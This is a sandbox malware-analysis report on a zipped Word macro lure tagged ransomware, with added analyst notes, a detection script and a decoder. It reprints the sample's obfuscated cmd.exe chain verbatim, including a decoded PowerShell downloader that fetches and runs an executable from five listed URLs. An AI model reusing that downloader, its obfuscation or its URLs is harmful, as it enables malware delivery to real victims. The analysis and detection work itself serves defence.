File name: 0478911415250.doc.zip
Full analysis: https://app.any.run/tasks/974a390c-7d6e-4500-8af1-dad58373dcc5
Verdict: Malicious activity
Threats: Ransomware

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

In this task the ransomware tag is the sandbox's classification of the sample, not behaviour recorded in the run: the event counters below show no write or delete events, the network section records no connections, and the process chain stalls before the downloaded payload stage, so this report shows nothing about what the final payload would do.

Analysis date: January 22, 2019, 12:12:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: ransomware

Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: 563A2A7FF65C3C9E1C0D955826BE785C
SHA1: A06B214EE39790AFE7FCA19926F6ABE9ABC3527F
SHA256: 1E335105CF6E43A53F6218817F1D90949314950DE1BBBE582CD78A76467FD73A
SSDEEP: 3072:Djs5jcvOh1YJlXJyBJ7YFAeN6Us6HQhvyvXHbb1BP:DI5jcv2YJlXJyBJ7zeN2a6UHbbjP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Unusual execution from Microsoft Office
      • WINWORD.EXE (PID: 3940)
    • Starts CMD.EXE for commands execution
      • WINWORD.EXE (PID: 3940)
  • SUSPICIOUS
    • Starts CMD.EXE for commands execution
      • cmd.exe (PID: 2112)
      • cmd.exe (PID: 2360)
      • cmd.exe (PID: 2472)
      • cmd.exe (PID: 3804)
    • Application launched itself
      • cmd.exe (PID: 2360)
  • INFO
    • Dropped object may contain Bitcoin addresses
      • WinRAR.exe (PID: 2844)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 3940)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 3940)
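The indicator names above are ANY.RUN's signatures. As an added example, not part of the report, the following Python applies the same ideas to process-creation telemetry: it rebuilds the parent chain and flags the patterns visible in this task (Office spawning a shell, `..` traversal in the image path, `%VAR:~n,m%` substring expansion, a `/V:` delayed-expansion character builder, the `FOR /F ... assoc|findstr` token lookup, and PowerShell downloader text inside a cmd line). The events are constructed from the Process information table of this report; long command lines are shortened and marked `...`, parent PIDs between the cmd.exe instances are inferred from the pipeline structure because the page only names the parent image, and the explorer.exe PID is invented.

```python
import re

# Added example, not part of the ANY.RUN report. CONSTRUCTED process-creation events
# built from this report's Process information table: PIDs, images and command lines
# are the page's (long command lines shortened to "..."); parent PIDs between the
# cmd.exe instances are inferred from the pipeline structure, and explorer.exe's PID
# is invented, because the page only names the parent image.
EVENTS = [
    {"pid": 1000, "ppid": 4, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 2844, "ppid": 1000, "image": "WinRAR.exe",
     "cmd": r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\0478911415250.doc.zip"'},
    {"pid": 3940, "ppid": 1000, "image": "WINWORD.EXE",
     "cmd": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\0478911415250.doc"'},
    {"pid": 3804, "ppid": 3940, "image": "cmd.exe",
     "cmd": r'''c:\h203\n1841\w6178\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set Zz3p=...&&for %0 in (70,6,78,61,48,...)do set vq=!vq!!Zz3p:~%0,1!&&if %0 geq 80 echo !vq:~4!|FOR /F "delims=AlED tokens=3" %Q IN ('assoc^^^|findstr llCm')DO %Q "'''},
    {"pid": 2360, "ppid": 3804, "image": "cmd.exe",
     "cmd": r'''CmD /V:/C"set Zz3p=...&&for %0 in (70,6,78,61,48,...)do set vq=!vq!!Zz3p:~%0,1!&&if %0 geq 80 echo !vq:~4!|FOR /F "delims=AlED tokens=3" %Q IN ('assoc^^^|findstr llCm')DO %Q "'''},
    {"pid": 4048, "ppid": 2360, "image": "cmd.exe",
     "cmd": r'''C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $o8292='z5512';$j1555=new-object Net.WebClient;...$j1555.DownloadFile($j8750, $i7560);...Invoke-Item $i7560;...$o770='q8506';"'''},
    {"pid": 2112, "ppid": 2360, "image": "cmd.exe",
     "cmd": r'''C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=AlED tokens=3" %Q IN ('assoc^|findstr llCm') DO %Q "'''},
    {"pid": 2472, "ppid": 2112, "image": "cmd.exe", "cmd": r"C:\Windows\system32\cmd.exe /c assoc|findstr llCm"},
    {"pid": 2748, "ppid": 2472, "image": "cmd.exe", "cmd": r'C:\Windows\system32\cmd.exe /S /D /c" assoc"'},
    {"pid": 2852, "ppid": 2472, "image": "findstr.exe", "cmd": "findstr llCm"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
ENV_SUBSTRING = re.compile(r"%[A-Za-z_]+:~-?\d+(?:,-?\d+)?%")
CHAR_BUILDER = re.compile(r"/V:.*\bfor\b.*\bin\s*\(\s*\d+(?:\s*,\s*\d+){3,}", re.I | re.S)
ASSOC_LOOKUP = re.compile(r"\bFOR\s+/F\b.*\bassoc\b.*\bfindstr\b", re.I | re.S)
DOWNLOADER = re.compile(r"WebClient|DownloadFile|DownloadString|Invoke-Item|IEX\b", re.I)


def check_process(ev, by_pid):
    """Return the reasons this process looks like part of an Office-macro launcher chain."""
    reasons = []
    parent = by_pid.get(ev["ppid"])
    image, cmd = ev["image"].lower(), ev["cmd"]
    if parent and parent["image"].lower() in OFFICE and image in SHELLS:
        reasons.append("office_spawns_shell")
    # Image path written with ".." segments, e.g. c:\h203\..\..\..\windows\system32\cmd.exe
    if re.search(r"\\\.\.\\", cmd.split(" ", 1)[0]):
        reasons.append("traversal_in_image_path")
    if ENV_SUBSTRING.search(cmd):
        reasons.append("env_substring_obfuscation")
    if CHAR_BUILDER.search(cmd):
        reasons.append("delayed_expansion_char_builder")
    if ASSOC_LOOKUP.search(cmd):
        reasons.append("assoc_findstr_token_lookup")
    if DOWNLOADER.search(cmd):
        reasons.append("powershell_downloader_text")
    return reasons


def analyze(events):
    """Map PID -> reasons for every process that triggers at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for ev in events:
        reasons = check_process(ev, by_pid)
        if reasons:
            findings[ev["pid"]] = reasons
    return findings


def ancestry(events, pid):
    """Image names from the root of the tree down to pid."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


if __name__ == "__main__":
    for pid, reasons in analyze(EVENTS).items():
        print(pid, " -> ".join(ancestry(EVENTS, pid)), reasons)
```

On these events only the four cmd.exe instances that carry the obfuscation (3804, 2360, 4048, 2112) fire; WinRAR, Word and the `assoc`/`findstr` helpers do not, and the ancestry of `findstr.exe` (PID 2852) runs explorer.exe, WINWORD.EXE, four cmd.exe hops, findstr.exe. The Office-parent rule alone is the high-confidence one; the others are cheap corroboration that survives renaming of the variables and alphabet.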
No Malware configuration.

TRiD: .zip | ZIP compressed archive (100)

EXIF (ZIP):
ZipFileName: 0478911415250.doc
ZipUncompressedSize: 268986
ZipCompressedSize: 153884
ZipCRC: 0xa18561ca
ZipModifyDate: 2019:01:22 11:31:03
ZipCompression: Deflated
ZipBitFlag: 0x0001
ZipRequiredVersion: 788
Total processes: 41
Monitored processes: 9
Malicious processes: 1
Suspicious processes: 2

Behavior graph: winrar.exe, winword.exe, six cmd.exe instances and findstr.exe; the parent/child relationships are in the Process information table below.

Process information

PID 2844 (parent process: explorer.exe)
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\0478911415250.doc.zip"
Path: C:\Program Files\WinRAR\WinRAR.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Version: 5.60.0

PID 3940 (parent process: explorer.exe)
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\0478911415250.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID 3804 (parent process: WINWORD.EXE)
CMD: c:\h203\n1841\w6178\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set Zz3p=\$Ua7so0VJjthXiBgfN:W_.~RMz3}/v5{r'l98Le1I=G-d2(PCu FA6by,+SD%nkc@mEO)pxT;HKq4w&&for %0 in (70,6,78,61,48,2,15,38,41,49,19,23,31,57,40,61,33,61,59,67,59,59,41,68,18,18,53,25,67,19,23,44,77,57,40,61,12,61,72,67,25,48,19,23,44,27,57,40,61,35,35,51,1,6,37,46,36,46,42,34,26,31,31,40,46,34,73,1,10,40,31,31,31,42,62,39,78,44,6,55,10,39,64,11,51,18,39,11,22,20,39,55,49,35,14,39,62,11,73,1,76,31,27,77,7,42,34,12,11,11,70,19,29,29,3,17,6,33,45,14,6,33,39,11,3,14,35,5,22,64,6,66,29,75,12,70,27,71,18,50,13,76,24,66,33,55,45,50,65,12,11,11,70,19,29,29,45,33,3,70,3,33,11,22,6,33,16,29,52,76,43,24,54,15,36,74,78,38,72,21,68,6,6,41,36,5,65,12,11,11,70,19,29,29,3,35,35,6,70,14,26,26,3,62,50,14,11,22,17,33,29,40,60,41,24,4,74,50,55,21,30,7,65,12,11,11,70,19,29,29,78,78,78,22,3,70,33,39,5,39,3,33,64,12,22,14,62,29,26,11,39,5,10,43,9,77,75,75,56,21,49,71,18,71,71,74,65,12,11,11,70,19,29,29,5,3,33,3,12,35,39,14,16,12,33,6,45,45,14,5,22,64,6,66,29,53,8,10,10,3,2,53,12,39,38,17,74,27,54,40,71,21,10,30,30,34,22,59,70,35,14,11,47,34,65,34,69,73,1,66,31,27,37,27,42,34,33,40,36,4,46,34,73,1,26,27,31,37,31,51,42,51,34,37,37,27,34,73,1,11,36,4,4,4,42,34,70,36,36,7,46,34,73,1,14,4,31,54,7,42,1,39,62,30,19,11,39,66,70,58,34,0,34,58,1,26,27,31,37,31,58,34,22,39,71,39,34,73,17,6,33,39,3,64,12,47,1,10,37,4,31,7,51,14,62,51,1,76,31,27,77,7,69,32,11,33,56,32,1,10,40,31,31,31,22,60,6,78,62,35,6,3,45,52,14,35,39,47,1,10,37,4,31,7,57,51,1,14,4,31,54,7,69,73,1,55,4,40,77,42,34,50,27,36,4,31,34,73,41,17,51,47,47,43,39,11,44,41,11,39,66,51,1,14,4,31,54,7,69,22,35,39,62,16,11,12,51,44,16,39,51,77,7,7,7,7,69,51,32,41,62,30,6,63,39,44,41,11,39,66,51,1,14,4,31,54,7,73,1,78,40,31,31,54,42,34,63,54,7,31,54,34,73,55,33,39,3,63,73,28,28,64,3,11,64,12,32,28,28,1,6,4,4,7,42,34,76,37,31,7,54,34,73,80)do set vq=!vq!!Zz3p:~%0,1!&&if %0 geq 80 echo !vq:~4!|FOR /F "delims=AlED tokens=3" %Q IN ('assoc^^^|findstr llCm')DO %Q "
Path: c:\windows\system32\cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2360 (parent process: cmd.exe)
CMD: CmD /V:/C"set Zz3p=\$Ua7so0VJjthXiBgfN:W_.~RMz3}/v5{r'l98Le1I=G-d2(PCu FA6by,+SD%nkc@mEO)pxT;HKq4w&&for %0 in (70,6,78,61,48,2,15,38,41,49,19,23,31,57,40,61,33,61,59,67,59,59,41,68,18,18,53,25,67,19,23,44,77,57,40,61,12,61,72,67,25,48,19,23,44,27,57,40,61,35,35,51,1,6,37,46,36,46,42,34,26,31,31,40,46,34,73,1,10,40,31,31,31,42,62,39,78,44,6,55,10,39,64,11,51,18,39,11,22,20,39,55,49,35,14,39,62,11,73,1,76,31,27,77,7,42,34,12,11,11,70,19,29,29,3,17,6,33,45,14,6,33,39,11,3,14,35,5,22,64,6,66,29,75,12,70,27,71,18,50,13,76,24,66,33,55,45,50,65,12,11,11,70,19,29,29,45,33,3,70,3,33,11,22,6,33,16,29,52,76,43,24,54,15,36,74,78,38,72,21,68,6,6,41,36,5,65,12,11,11,70,19,29,29,3,35,35,6,70,14,26,26,3,62,50,14,11,22,17,33,29,40,60,41,24,4,74,50,55,21,30,7,65,12,11,11,70,19,29,29,78,78,78,22,3,70,33,39,5,39,3,33,64,12,22,14,62,29,26,11,39,5,10,43,9,77,75,75,56,21,49,71,18,71,71,74,65,12,11,11,70,19,29,29,5,3,33,3,12,35,39,14,16,12,33,6,45,45,14,5,22,64,6,66,29,53,8,10,10,3,2,53,12,39,38,17,74,27,54,40,71,21,10,30,30,34,22,59,70,35,14,11,47,34,65,34,69,73,1,66,31,27,37,27,42,34,33,40,36,4,46,34,73,1,26,27,31,37,31,51,42,51,34,37,37,27,34,73,1,11,36,4,4,4,42,34,70,36,36,7,46,34,73,1,14,4,31,54,7,42,1,39,62,30,19,11,39,66,70,58,34,0,34,58,1,26,27,31,37,31,58,34,22,39,71,39,34,73,17,6,33,39,3,64,12,47,1,10,37,4,31,7,51,14,62,51,1,76,31,27,77,7,69,32,11,33,56,32,1,10,40,31,31,31,22,60,6,78,62,35,6,3,45,52,14,35,39,47,1,10,37,4,31,7,57,51,1,14,4,31,54,7,69,73,1,55,4,40,77,42,34,50,27,36,4,31,34,73,41,17,51,47,47,43,39,11,44,41,11,39,66,51,1,14,4,31,54,7,69,22,35,39,62,16,11,12,51,44,16,39,51,77,7,7,7,7,69,51,32,41,62,30,6,63,39,44,41,11,39,66,51,1,14,4,31,54,7,73,1,78,40,31,31,54,42,34,63,54,7,31,54,34,73,55,33,39,3,63,73,28,28,64,3,11,64,12,32,28,28,1,6,4,4,7,42,34,76,37,31,7,54,34,73,80)do set vq=!vq!!Zz3p:~%0,1!&&if %0 geq 80 echo !vq:~4!|FOR /F "delims=AlED tokens=3" %Q IN ('assoc^^^|findstr llCm')DO %Q "
Path: C:\Windows\system32\cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 4048 (parent process: cmd.exe)
CMD: C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $o8292='z5512';$j1555=new-object Net.WebClient;$q5340='http://afordioretails.com/Khp3xNuXqRmrbdu@http://drapart.org/FqGR6B9HwLT_OooI9s@http://allopizzanuit.fr/1DIR7Hub_v0@http://www.apresearch.in/ztesjGJ4KKy_CxNxxH@http://sarahleighroddis.com/AVjjaUAheLfH361x_jvv'.Split('@');$m5383='r1972';$z3585 = '883';$t9777='p9902';$i7560=$env:temp+'\'+$z3585+'.exe';foreach($j8750 in $q5340){try{$j1555.DownloadFile($j8750, $i7560);$b714='u3975';If ((Get-Item $i7560).length -ge 40000) {Invoke-Item $i7560;$w1556='k6056';break;}}catch{}}$o770='q8506';"
Path: C:\Windows\system32\cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2112 (parent process: cmd.exe)
CMD: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=AlED tokens=3" %Q IN ('assoc^|findstr llCm') DO %Q "
Path: C:\Windows\system32\cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2472 (parent process: cmd.exe)
CMD: C:\Windows\system32\cmd.exe /c assoc|findstr llCm
Path: C:\Windows\system32\cmd.exe
User: admin
Company: Micros
oft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2748 (parent process: cmd.exe)
CMD: C:\Windows\system32\cmd.exe /S /D /c" assoc"
Path: C:\Windows\system32\cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2852 (parent process: cmd.exe)
CMD: findstr llCm
Path: C:\Windows\system32\findstr.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Find String (QGREP) Utility
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Notes on the chain (an analyst reading of the table; the page records the events, the interpretation is added here):

WINWORD.EXE (3940) starts cmd.exe (3804) through a non-canonical path, c:\h203\n1841\w6178\..\..\..\windows\system32\cmd.exe. The three bogus directories are cancelled by the `..` segments, so the path still resolves to system32\cmd.exe while defeating a naive string match on the image path. `%ProgramData:~0,1%%ProgramData:~9,2%` is a substring expansion of C:\ProgramData and yields `CmD`, which is why the child's command line (2360) begins `CmD /V:/C`.

2360 enables delayed expansion (`/V:`) and rebuilds the next stage one character at a time: `for %0 in (index list) do set vq=!vq!!Zz3p:~%0,1!` indexes into the 79-character alphabet stored in Zz3p. The result, `echo !vq:~4!`, is piped into `FOR /F "delims=AlED tokens=3" %Q IN ('assoc|findstr llCm') DO %Q "`, so the third token of whichever `assoc` line contains `llCm` becomes the command that reads the echoed text from its standard input.

4048 is the left-hand side of that pipe and exposes the decoded stage. Once `pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll` expands (to `powershell` on a standard install, where %PUBLIC% is C:\Users\Public, %SESSIONNAME% is Console and %TEMP% ends in \Temp), it is a PowerShell downloader that tries, in order:
http://afordioretails.com/Khp3xNuXqRmrbdu
http://drapart.org/FqGR6B9HwLT_OooI9s
http://allopizzanuit.fr/1DIR7Hub_v0
http://www.apresearch.in/ztesjGJ4KKy_CxNxxH
http://sarahleighroddis.com/AVjjaUAheLfH361x_jvv
saving the response to $env:temp\883.exe and running it with Invoke-Item only if the file is at least 40000 bytes (a check against HTML error pages and sinkholes). These URLs are indicators even though none was contacted in this run.

2112, 2472, 2748 and 2852 are the right-hand side of the pipe. `findstr llCm` exited with code 1 (no match), so `%Q` was never assigned and the loop body never ran: no PowerShell process appears in the table and the network section below records no DNS, TCP or HTTP activity. The page does not show which association the sample expected; a plausible target is `.cdxml=Microsoft.PowerShellCmdletDefinitionXML.1`, registered by PowerShell 3.0 and later, whose third token under those delimiters is `Cmd`, and which this Windows 7 / PowerShell 2.0 image evidently lacks. The detonation is therefore incomplete, and nothing here describes what 883.exe would have been.
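The index loop in PID 2360 and the environment-substring tricks in PIDs 3804 and 4048 can be replayed offline. The Python below is an added example written for this page, not code from the ANY.RUN report or from the sample: the alphabet and the index list are copied verbatim from the command line of PID 2360, while the environment values (PUBLIC, SESSIONNAME, TEMP, ProgramData) and the `assoc` line `.cdxml=Microsoft.PowerShellCmdletDefinitionXML.1` are assumptions, because the page shows neither the sandbox's environment nor the association the sample expected `findstr llCm` to match (that ProgID is registered by PowerShell 3.0 and later, which would explain the `findstr` exit code of 1 on this Windows 7 image). The script also reproduces the cmd.exe detail the sample relies on: in command-line mode an undefined `!vq!` is left as literal text, so the first loop iteration seeds the variable with the four characters `!vq!`, which `echo !vq:~4!` then strips.

```python
import re

# Added example for this page; not code from the ANY.RUN report or from the sample.
# ALPHABET and INDEX_LIST are copied verbatim from the cmd.exe command line of PID 2360.
ALPHABET = r"\$Ua7so0VJjthXiBgfN:W_.~RMz3}/v5{r'l98Le1I=G-d2(PCu FA6by,+SD%nkc@mEO)pxT;HKq4w"
INDEX_LIST = (
    "70,6,78,61,48,2,15,38,41,49,19,23,31,57,40,61,33,61,59,67,59,59,41,68,18,18,53,25,67,19,23,44,77,57,40,61,12,61,72,67,"
    "25,48,19,23,44,27,57,40,61,35,35,51,1,6,37,46,36,46,42,34,26,31,31,40,46,34,73,1,10,40,31,31,31,42,62,39,78,44,6,55,"
    "10,39,64,11,51,18,39,11,22,20,39,55,49,35,14,39,62,11,73,1,76,31,27,77,7,42,34,12,11,11,70,19,29,29,3,17,6,33,45,14,"
    "6,33,39,11,3,14,35,5,22,64,6,66,29,75,12,70,27,71,18,50,13,76,24,66,33,55,45,50,65,12,11,11,70,19,29,29,45,33,3,70,"
    "3,33,11,22,6,33,16,29,52,76,43,24,54,15,36,74,78,38,72,21,68,6,6,41,36,5,65,12,11,11,70,19,29,29,3,35,35,6,70,14,"
    "26,26,3,62,50,14,11,22,17,33,29,40,60,41,24,4,74,50,55,21,30,7,65,12,11,11,70,19,29,29,78,78,78,22,3,70,33,39,5,39,"
    "3,33,64,12,22,14,62,29,26,11,39,5,10,43,9,77,75,75,56,21,49,71,18,71,71,74,65,12,11,11,70,19,29,29,5,3,33,3,12,35,"
    "39,14,16,12,33,6,45,45,14,5,22,64,6,66,29,53,8,10,10,3,2,53,12,39,38,17,74,27,54,40,71,21,10,30,30,34,22,59,70,35,"
    "14,11,47,34,65,34,69,73,1,66,31,27,37,27,42,34,33,40,36,4,46,34,73,1,26,27,31,37,31,51,42,51,34,37,37,27,34,73,1,11,"
    "36,4,4,4,42,34,70,36,36,7,46,34,73,1,14,4,31,54,7,42,1,39,62,30,19,11,39,66,70,58,34,0,34,58,1,26,27,31,37,31,"
    "58,34,22,39,71,39,34,73,17,6,33,39,3,64,12,47,1,10,37,4,31,7,51,14,62,51,1,76,31,27,77,7,69,32,11,33,56,32,1,10,"
    "40,31,31,31,22,60,6,78,62,35,6,3,45,52,14,35,39,47,1,10,37,4,31,7,57,51,1,14,4,31,54,7,69,73,1,55,4,40,77,42,"
    "34,50,27,36,4,31,34,73,41,17,51,47,47,43,39,11,44,41,11,39,66,51,1,14,4,31,54,7,69,22,35,39,62,16,11,12,51,44,16,39,"
    "51,77,7,7,7,7,69,51,32,41,62,30,6,63,39,44,41,11,39,66,51,1,14,4,31,54,7,73,1,78,40,31,31,54,42,34,63,54,7,31,"
    "54,34,73,55,33,39,3,63,73,28,28,64,3,11,64,12,32,28,28,1,6,4,4,7,42,34,76,37,31,7,54,34,73,80"
)
INDICES = [int(n) for n in INDEX_LIST.split(",")]

# ASSUMED sandbox environment (Windows 7, user "admin"); the page does not show it.
SANDBOX_ENV = {
    "PUBLIC": r"C:\Users\Public",
    "SESSIONNAME": "Console",
    "TEMP": r"C:\Users\admin\AppData\Local\Temp",
    "PROGRAMDATA": r"C:\ProgramData",
}

def cmd_substring(value, start, length=None):
    """Emulate the cmd.exe %VAR:~start,len% / !VAR:~start,len! substring syntax."""
    if start < 0:
        start = max(len(value) + start, 0)
    if length is None:
        return value[start:]
    if length < 0:  # negative len: stop that many characters before the end
        return value[start:len(value) + length]
    return value[start:start + length]

def build_vq(alphabet=ALPHABET, indices=INDICES):
    """Replay: for %0 in (...) do set vq=!vq!!Zz3p:~%0,1!
    In command-line mode cmd.exe leaves an undefined !vq! as literal text, so the
    first iteration seeds vq with "!vq!"; that is why the sample echoes !vq:~4!.
    An index past the end of the alphabet (80 here) contributes nothing."""
    vq = None
    for i in indices:
        vq = ("!vq!" if vq is None else vq) + cmd_substring(alphabet, i, 1)
    return vq

ENV_REF = re.compile(r"%([A-Za-z_]+):~(-?\d+)(?:,(-?\d+))?%")

def expand_env_substrings(text, env):
    """Resolve %VAR:~start,len% references; undefined variables stay literal."""
    def repl(m):
        value = env.get(m.group(1).upper())
        if value is None:
            return m.group(0)
        length = None if m.group(3) is None else int(m.group(3))
        return cmd_substring(value, int(m.group(2)), length)
    return ENV_REF.sub(repl, text)

def for_f_token(line, delims, token):
    """Emulate FOR /F "delims=... tokens=N": runs of delimiters count as one."""
    parts = [p for p in re.split("[" + re.escape(delims) + "]", line) if p]
    return parts[token - 1] if len(parts) >= token else ""

def extract_iocs(ps_text):
    """Pull the download URLs and the minimum-size check out of the decoded stage."""
    return {
        "urls": re.findall(r"https?://[^'@\s]+", ps_text),
        "min_size": int(re.search(r"-ge (\d+)", ps_text).group(1)),
    }

def decode_stage():
    """Return (text as echoed by PID 2360, same text with env substrings expanded)."""
    echoed = cmd_substring(build_vq(), 4)  # echo !vq:~4!
    return echoed, expand_env_substrings(echoed, SANDBOX_ENV)

if __name__ == "__main__":
    echoed, resolved = decode_stage()
    print(resolved)
    print(extract_iocs(resolved))
    # %ProgramData:~0,1%%ProgramData:~9,2% from PID 3804 -> "CmD"
    print(expand_env_substrings("%ProgramData:~0,1%%ProgramData:~9,2%", SANDBOX_ENV))
    # Assumed assoc line a PowerShell 3.0+ host would return for `findstr llCm`
    print(for_f_token(".cdxml=Microsoft.PowerShellCmdletDefinitionXML.1", "AlED", 3))
```

The echoed text the script produces is exactly the argument of PID 4048 above, which is the cheapest way to confirm that the alphabet and index list were captured intact; the expanded form begins `powershell`, and `for_f_token` on the assumed association returns `Cmd`, the command that would have consumed the piped text.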
Total events: 1 339
Read events: 928
Write events: 0
Delete events: 0

Modification events: no data

Executable files: 0
Suspicious files: 0
Text files: 3
Unknown types: 5

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
3940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDE60.tmp.cvr | - | not reported | not reported
3940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A1B904A.jpg | - | not reported | not reported
3940 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 47D4ABDD6A3AF62D82904BDDED74943C | 8E826A430E60C52DB9DE71FC5A3DF36E28A6AA32F6BC062069E0FDE818509727
3940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 1CD265AE1717D986BEDAB0CA1E189D5A | 6FF35A5A210DD784FCCD6DA133EDDCDA36C6D0470DDBEF4CB804C55FAD62420E
3940 | WINWORD.EXE | C:\Users\admin\Desktop\~$78911415250.doc | pgc | 7DCB149DD7492ED51B34EBB4CCEDFB89 | 14B3F6F0F67B53306EAB3389709B67C91D5273C4141551F83BD83B3D75E6FEBE
3940 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\0478911415250.doc.LNK | lnk | 47B4274640E10F7F78F36BE7A91B54DF | 40DDAE9ADFA155F698BFF72AC634AADCFCF18A2DBF4EC196E2CF7E6568F300E3
3940 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 5669342464A29A5B7EBA2F9AD623A18A | 2FBD3B2F4FC578414F1F6A037DDCA165F935296117E1902722C2EC9F1AE21277
2844 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2844.16280\0478911415250.doc | xml | 0E1215AED06333D0329F17D9F9ACB259 | B97D4CF1B9BCBBC27F547EEAD8201A7120F5398F9BA4483ECB4A9F6CB990B300

Two rows are worth more than a glance. The document WinRAR extracts (last row) is typed `xml` rather than as an OLE2 compound file despite its .doc extension, so OLE-only parsers will not see its macro; its MD5 and SHA256 are the hashes to pivot on for the lure itself, since the zip hashes at the top of the report change with every repack. And Word writing `VBE\MSForms.exd` (typed `tlb`, the VBA cache of the MSForms control type library) is the trace left when the VBA environment loads MSForms, consistent with the macro execution that the cmd.exe chain under Process information shows.
HTTP(S) requests: 0
TCP/UDP connections: 0
DNS requests: 0
Threats: 0

HTTP requests: no HTTP requests

Connections: no data
DNS requests: no data
Threats: no threats detected
Debug info: none